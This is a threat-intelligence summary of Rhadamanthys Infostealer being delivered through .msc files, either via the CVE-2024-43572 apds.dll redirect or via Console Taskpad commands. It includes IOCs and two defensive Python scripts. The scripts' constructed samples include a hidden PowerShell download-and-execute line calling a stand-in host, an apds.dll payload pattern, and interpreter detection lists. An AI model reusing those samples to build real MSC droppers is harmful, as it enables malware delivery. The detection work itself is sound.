Full Report
AhnLab SEcurity intelligence Center (ASEC) has confirmed that Rhadamanthys Infostealer is being distributed as a file with the MSC extension. The MSC extension is an XML-based format that is executed by the Microsoft Management Console (MMC); it can register and execute various tasks, such as running script code, commands, and programs. There […]
Analysis Summary
# Tool/Technique: MSC Container / Rhadamanthys Infostealer Delivery
## Overview
This summary describes the distribution and execution mechanisms of malware that uses the **.MSC (Microsoft Management Console saved console)** file as a container, specifically how it delivers the **Rhadamanthys Infostealer**. Two execution methods are detailed: one exploiting a vulnerability in an MMC-loaded DLL (`apds.dll`), and another abusing native MMC functionality via a Console Taskpad.
## Technical Details
- Type: Malware Delivery Mechanism/Container (MSC file executing Rhadamanthys)
- Platform: Windows
- Capabilities: Execution of arbitrary code or commands via MMC features or exploitation of a specific DLL vulnerability.
- First Seen: Distribution of MSC malware saw a rise in June 2024.
## MITRE ATT&CK Mapping
The analysis suggests mappings related to delivery, execution, and defense evasion depending on the specific attack chain used:
- **TA0002 - Execution**
- T1204.002 - User Execution: Malicious File
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell, and T1059.001 - PowerShell (the Taskpad variant runs a shell command that launches PowerShell)
- **TA0005 - Defense Evasion**
- T1218.014 - System Binary Proxy Execution: MMC (`mmc.exe`, a signed Microsoft binary, executes the attacker's task or resource reference)
## Functionality
### Core Capabilities
MSC files can register tasks (script code, command execution, program launches) that MMC runs on the user's behalf. This is legitimate MMC functionality rather than a bug, which is what makes the file type usable as a malware container.
### Advanced Features
1. **Vulnerability Exploitation (CVE-2024-43572):** The MSC file references `res://apds.dll/redirect.html?target=...` through the `res://` protocol. `redirect.html` is an HTML resource embedded in `apds.dll`; it passes whatever follows `target=` to `.exec()`, so attacker-supplied script runs in the MMC-hosted rendering context without going through a normal console task. Systems patched for CVE-2024-43572 are not affected by this variant.
2. **Console Taskpad Execution:** A Console Taskpad task carries its command between `<task:command>` and `</task:command>` tags in the MSC file; MMC reads and runs that command (e.g., a command shell or PowerShell invocation) using entirely legitimate functionality, so this variant needs no vulnerability and works on patched systems.
3. **Phased Delivery (Taskpad example):** The MSC file is disguised as an MS Word document; upon opening, it downloads and executes a PowerShell script, which subsequently drops and runs the **Rhadamanthys Infostealer** executable (named `eRSg.mp3` in the `%LocalAppData%` directory).
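Because an MSC file is plain XML, both variants can be triaged statically before `mmc.exe` ever opens the file. The following scanner is an added example (not code from ASEC or from the article) in Python: it walks every text node and attribute in the document rather than relying on the exact MSC schema, since console strings, including taskpad command lines, are normally held in the StringTable and referenced by ID. It flags the `res://apds.dll/redirect.html?target=` pattern from the first variant, interpreter launches characteristic of the second, and embedded URLs. The three sample documents are constructed for illustration and only approximate real MSC structure; `example.invalid` stands in for a real download URL.

```python
"""Static triage of .msc (MMC saved console) files for the two execution paths
above. Added example; samples are constructed, not real ASEC artefacts."""
import re
import sys
import xml.etree.ElementTree as ET

# CVE-2024-43572 vector: res:// reference to apds.dll's redirect.html whose
# target= parameter carries the script to run.
APDS_RE = re.compile(
    r"res://[^\s\"'<>]*apds\.dll/redirect\.html\?[^\s\"'<>]*target=", re.IGNORECASE)

# Interpreters/LOLBins a console taskpad has no legitimate reason to launch.
INTERP_RE = re.compile(
    r"(?:^|[\s\"'/\\])(cmd|powershell|pwsh|mshta|wscript|cscript|rundll32|"
    r"certutil|bitsadmin)(?:\.exe)?(?=$|[\s\"'])", re.IGNORECASE)

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def _strings(root):
    """Yield every non-empty text node and attribute value in the document."""
    for element in root.iter():
        if element.text and element.text.strip():
            yield element.text.strip()
        for value in element.attrib.values():
            if value.strip():
                yield value.strip()


def scan_msc(xml_text):
    """Return (finding_type, evidence) tuples for one .msc document."""
    findings = []
    for s in _strings(ET.fromstring(xml_text)):
        if APDS_RE.search(s):
            findings.append(("apds_redirect_xss", s))
        if INTERP_RE.search(s):
            findings.append(("taskpad_interpreter", s))
        for url in URL_RE.findall(s):
            findings.append(("embedded_url", url))
    return findings


def verdict(findings):
    """Collapse findings to a triage verdict: either execution path is decisive."""
    kinds = {kind for kind, _ in findings}
    if kinds & {"apds_redirect_xss", "taskpad_interpreter"}:
        return "malicious"
    return "suspicious" if kinds else "clean"


# Constructed sample: taskpad variant, command and parameters held in the StringTable.
SAMPLE_TASKPAD_MSC = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="UserSDI">
  <StringTables><StringTable><Strings>
    <String ID="1" Refs="1">Contract_2024.docx</String>
    <String ID="2" Refs="1">cmd</String>
    <String ID="3" Refs="1">/c powershell -w hidden -c "iwr https://example.invalid/TSWY.txt | iex"</String>
  </Strings></StringTable></StringTables>
  <Taskpads><Taskpad><Tasks>
    <Task Type="CommandLine">
      <Command Directory="" WindowState="Minimized">
        <String Name="Command" ID="2"/>
        <String Name="Parameters" ID="3"/>
      </Command>
    </Task>
  </Tasks></Taskpad></Taskpads>
</MMC_ConsoleFile>"""

# Constructed sample: apds.dll variant, the whole payload sits in one string.
SAMPLE_APDS_MSC = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="UserSDI">
  <StringTables><StringTable><Strings>
    <String ID="1" Refs="1">res://apds.dll/redirect.html?target=javascript:eval('/*payload*/')</String>
  </Strings></StringTable></StringTables>
</MMC_ConsoleFile>"""

# Constructed sample: an ordinary console with no tasks.
SAMPLE_BENIGN_MSC = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="UserSDI">
  <StringTables><StringTable><Strings>
    <String ID="1" Refs="1">Event Viewer (Local)</String>
  </Strings></StringTable></StringTables>
</MMC_ConsoleFile>"""


if __name__ == "__main__":
    # Usage: python msc_triage.py file.msc   (without an argument, scans the samples)
    if len(sys.argv) > 1:
        with open(sys.argv[1], "r", encoding="utf-8-sig", errors="replace") as fh:
            docs = {sys.argv[1]: fh.read()}
    else:
        docs = {"taskpad": SAMPLE_TASKPAD_MSC, "apds": SAMPLE_APDS_MSC,
                "benign": SAMPLE_BENIGN_MSC}
    for name, text in docs.items():
        result = scan_msc(text)
        print(f"{name}: {verdict(result)}")
        for kind, evidence in result:
            print(f"  {kind}: {evidence}")
```

The interpreter heuristic is deliberately broad (any string that names `cmd`, `powershell`, `mshta` and the like as a standalone token), which is acceptable for gateway triage because legitimate consoles shipped with Windows do not carry shell command lines; tune the list to local needs before using it as a blocking control.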
## Indicators of Compromise
- File Hashes:
- MD5: `560024efca8e5730dc4decf2e2c252db`, `7b26a25d7bf2be6fdc2810ba5f519b4a`, `9b738d877e6590b40c2784be10c215d7`
- File Names:
- Payload Dropped: `eRSg.mp3` (Rhadamanthys Infostealer)
- Registry Keys: [Not explicitly mentioned]
- Network Indicators (Defanged):
- URL: `hxxps://daddychill[.]nl:1537/77950e0740519/udpne49n.du0i8`
- URL: `hxxps://oshi[.]at/SdUr/TSWY.txt`
- Behavioral Indicators:
- `mmc.exe` (opened with a user-supplied `.msc` file) spawning `powershell.exe` or `cmd.exe`, followed by a PowerShell download of a script.
- Creation of an executable under `%LocalAppData%` by that PowerShell process, disguised with a non-executable extension (`eRSg.mp3`).
## Associated Threat Actors
The article explicitly names the payload delivered as **Rhadamanthys Infostealer**, though the specific threat group using this MSC delivery method is not named in the provided context.
## Detection Methods
- Signature-based detection: signatures for the known MD5 hashes above; because the `.msc` container is plain XML, content signatures for the malicious strings themselves are also feasible.
- Behavioral detection: alert on process creation where the parent is `mmc.exe` launched with a `.msc` argument from a user-writable path and the child is `powershell.exe`, `cmd.exe` or a similar interpreter; inspect `.msc` file contents (for example at the mail or web gateway) for `res://` references to `apds.dll/redirect.html` and for taskpad command lines.
- YARA rules: [Not available in context]
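The process-chain rule above is the one worth operationalising first, because it catches both variants regardless of whether the payload is staged through a taskpad or the `apds.dll` resource. The following is an added example (not ASEC's detection logic) in Python that runs the rule over constructed Sysmon-style ProcessCreate (Event ID 1) and FileCreate (Event ID 11) records. Field names follow Sysmon; the process IDs, paths, user name and `example.invalid` URL are constructed. It correlates the three behavioural indicators: `mmc.exe` opening a `.msc` from a user-writable path, that `mmc.exe` spawning an interpreter, and that interpreter writing a file under `%LocalAppData%`.

```python
"""Correlate Sysmon-style events into the mmc.exe -> interpreter -> dropped file
chain described above. Added example; all events below are constructed."""
import re

INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe"}
MSC_ARG_RE = re.compile(r"\.msc\b", re.IGNORECASE)
# Consoles shipped with Windows live under %SystemRoot%; a mail- or
# web-delivered .msc lands in one of these instead.
DROP_DIRS = ("\\users\\", "\\temp\\", "\\appdata\\")


def basename(path):
    """Lower-cased file name of a Windows path (also tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, process_id, evidence) alerts in event order.

    msc_from_user_path          mmc.exe opened a .msc from a user-writable location
    mmc_spawned_interpreter     mmc.exe holding a .msc started a shell/interpreter
    dropped_file_from_msc_chain that interpreter wrote a file under %LocalAppData%
    """
    alerts = []
    tainted_pids = set()  # interpreters spawned by an mmc.exe that loaded a .msc
    for ev in events:
        if ev["EventID"] == 1:
            image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
            cmd = ev["CommandLine"]
            if (image == "mmc.exe" and MSC_ARG_RE.search(cmd)
                    and any(d in cmd.lower() for d in DROP_DIRS)):
                alerts.append(("msc_from_user_path", ev["ProcessId"], cmd))
            if (parent == "mmc.exe" and image in INTERPRETERS
                    and MSC_ARG_RE.search(ev["ParentCommandLine"])):
                tainted_pids.add(ev["ProcessId"])
                alerts.append(("mmc_spawned_interpreter", ev["ProcessId"], cmd))
        elif ev["EventID"] == 11:
            target = ev["TargetFilename"]
            if ev["ProcessId"] in tainted_pids and "\\appdata\\local\\" in target.lower():
                alerts.append(("dropped_file_from_msc_chain", ev["ProcessId"], target))
    return alerts


# Constructed telemetry: one malicious chain plus two benign look-alikes.
MMC_CMD = r'"C:\Windows\System32\mmc.exe" "C:\Users\victim\Downloads\Invoice.docx.msc"'
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "ParentProcessId": 3988,
     "Image": r"C:\Windows\System32\mmc.exe", "CommandLine": MMC_CMD,
     "ParentImage": EXPLORER, "ParentCommandLine": EXPLORER},
    {"EventID": 1, "ProcessId": 4388, "ParentProcessId": 4120, "Image": PS_IMAGE,
     "CommandLine": r'powershell -w hidden -c "iwr https://example.invalid/TSWY.txt | iex"',
     "ParentImage": r"C:\Windows\System32\mmc.exe", "ParentCommandLine": MMC_CMD},
    {"EventID": 11, "ProcessId": 4388, "Image": PS_IMAGE,
     "TargetFilename": r"C:\Users\victim\AppData\Local\eRSg.mp3"},
    # Benign: an administrator opens Event Viewer from %SystemRoot%.
    {"EventID": 1, "ProcessId": 5000, "ParentProcessId": 3988,
     "Image": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" C:\Windows\system32\eventvwr.msc /s',
     "ParentImage": EXPLORER, "ParentCommandLine": EXPLORER},
    # Benign: interactive PowerShell; writes under %LocalAppData% are normal for it.
    {"EventID": 1, "ProcessId": 5100, "ParentProcessId": 3988, "Image": PS_IMAGE,
     "CommandLine": "powershell.exe", "ParentImage": EXPLORER,
     "ParentCommandLine": EXPLORER},
    {"EventID": 11, "ProcessId": 5100, "Image": PS_IMAGE,
     "TargetFilename": r"C:\Users\victim\AppData\Local\Temp\profile.ps1"},
]


if __name__ == "__main__":
    for rule, pid, evidence in detect(EVENTS):
        print(f"{rule:28} pid={pid}  {evidence}")
```

The file-write rule only fires for processes already tainted by the parent-chain rule, so routine PowerShell activity under `%LocalAppData%` stays quiet; the `msc_from_user_path` rule is the low-fidelity early signal and should be tuned against the environment's own console usage before paging anyone on it.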
## Mitigation Strategies
- Patching: Users should ensure systems are patched against **CVE-2024-43572** to mitigate the DLL exploitation vector.
- User Education: Caution users regarding opening `.MSC` files from unknown or unexpected sources, especially those disguised as other document types (like MS Word).
- Application Control: Block or quarantine `.msc` attachments and downloads at the mail and web gateway; use application control to prevent unsigned binaries from executing out of `%LocalAppData%`, and EDR rules to block `mmc.exe` from spawning script interpreters such as PowerShell.
## Related Tools/Techniques
- **Rhadamanthys Infostealer:** The payload being delivered via this MSC mechanism.
- **CVE-2024-43572:** The specific vulnerability in `apds.dll` exploited by the first MSC variant.
- **Microsoft Management Console (MMC):** The native Windows component leveraged by the second variant.